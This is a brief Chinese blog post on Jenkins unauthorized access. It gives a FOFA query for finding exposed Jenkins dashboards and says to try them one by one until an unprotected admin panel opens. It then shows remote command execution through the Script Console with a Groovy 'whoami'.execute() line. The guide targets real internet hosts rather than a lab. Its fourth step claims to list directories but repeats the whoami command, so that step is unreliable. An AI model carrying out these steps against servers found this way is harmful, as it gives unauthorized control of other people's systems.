【Jenkins未授权访问漏洞 】

Mr.sloane2024-08-06 19:17

默认情况下 Jenkins面板中用户可以选择执行脚本界面来操作一些系统层命令,攻击者可通过未授权访问漏洞或者暴力破解用户密码等进入后台管理服务,通过脚本执行界面从而获取服务器权限。

第一步:使用fofa语句搜索

搜索语句:

port="8080" && app="JENKINS" && title=="Dashboard [Jenkins]"

一个一个搜索,直到出现 Manage Jenkins,在打开的URL中...点击 Manage Jenkins

Scritp Console 再执行以下命令.

第二步:点进去后,页面往下翻看到Scritp Console------点击。

第三步:执行命令,查看当前用户名

println "whoami".execute().text

如下图就是执行中

第四步:执行命令,查看目录

println "whoami".execute().text

相关推荐
Maki Winster16 分钟前
在 Ubuntu 下配置 oh-my-posh —— 普通用户 + root 各自使用独立主题(共享可执行)
linux·运维·ubuntu
翻滚吧键盘1 小时前
debian及衍生发行版apt包管理常见操作
运维·debian
Charlene Fung2 小时前
vs code远程自动登录服务器,无需手动输入密码的终极方案(windows版)
运维·服务器·vscode·ssh
碣石潇湘无限路2 小时前
【部署与总结】从本地运行到公网服务器的全过程
运维·服务器
linux修理工2 小时前
ipmitool 使用简介(ipmitool sel list & ipmitool sensor list)
运维·服务器
XM-54582 小时前
2025微信小程序wxapkg解包全攻略
linux·运维·小程序
朗晴3 小时前
文本编辑器VIM的使用方法!
linux·运维·服务器
东林牧之3 小时前
CICD[导航]、docker+gitlab+harbor+jenkins从安装到部署
docker·gitlab·jenkins
小林up3 小时前
github push:ssh: connect to host github.com port 22
运维·ssh·github
梁bk6 小时前
[Nginx]反向代理和负载均衡
运维·nginx·负载均衡
热门推荐
01集群聊天服务器---MySQL数据库的建立02GPU 进阶笔记(二):华为昇腾 910B GPU03Coze扣子平台完整体验和实践(附国内和国际版对比)04使用Ruby接入实时行情API教程05Word粘贴时出现“运行时错误53,文件未找到:MathPage.WLL“的解决方案06扣子(coze)实战|我用扣子搭建了一个自动分析小红薯笔记内容的AI应用|详细步骤拆解07基于odoo17的设计模式详解---装饰模式08扣子空间的使用教程与大模型技术思考09DeepSeek各版本说明与优缺点分析10Java学习第十五部分——MyBatis